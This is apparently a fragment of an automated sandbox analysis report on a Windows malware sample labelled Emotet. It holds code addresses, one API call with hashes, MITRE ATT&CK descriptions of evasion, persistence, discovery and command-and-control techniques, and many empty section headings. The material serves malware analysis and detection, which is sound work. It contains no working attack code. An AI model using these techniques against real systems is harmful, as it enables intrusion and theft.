				return _t55;
			}

0x00ea17d2
0x00ea17d5
0x00ea17d7
0x00ea17db
0x00ea17dc
0x00ea17e1
0x00ea17e8
0x00ea17f1
0x00ea17f8
0x00ea17ff
0x00ea1803
0x00ea1807
0x00ea180e
0x00ea181b
0x00ea1822
0x00ea1825
0x00ea182c
0x00ea1833
0x00ea1844
0x00ea1847
0x00ea1859
0x00ea185c
0x00ea1863
0x00ea186a
0x00ea186e
0x00ea1881
0x00ea188d
0x00ea1893

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00EA188D

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: e426071d8e1b29c5ac1dd33172457598e5309bd371eee332f029afe27b1d3456
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 0E2102B5D0120DFBDB08DFA4C94A9EEBBB4EB44304F208189E525B7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 5YO8hZg21O

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution